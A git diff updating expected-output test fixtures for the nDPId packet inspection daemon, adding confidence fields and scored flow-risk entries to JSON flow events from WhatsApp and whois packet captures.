 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01300{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01326{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","total-events-serialized":17}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -23,10 +23,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4624554 bytes
-~~ total memory freed........: 4624554 bytes
-~~ total allocations/frees...: 100190/100190
+~~ total memory allocated....: 4709179 bytes
+~~ total memory freed........: 4709179 bytes
+~~ total allocations/frees...: 101780/101780
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 1305 chars
-~~ json string avg len.......: 806 chars
+~~ json string max len.......: 1331 chars
+~~ json string avg len.......: 819 chars
diff --git a/test/results/whois.pcapng.out b/test/results/whois.pcapng.out
index 73dfd6ab0..671e745e1 100644
--- a/test/results/whois.pcapng.out
+++ b/test/results/whois.pcapng.out
@@ -3,20 +3,20 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}}
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
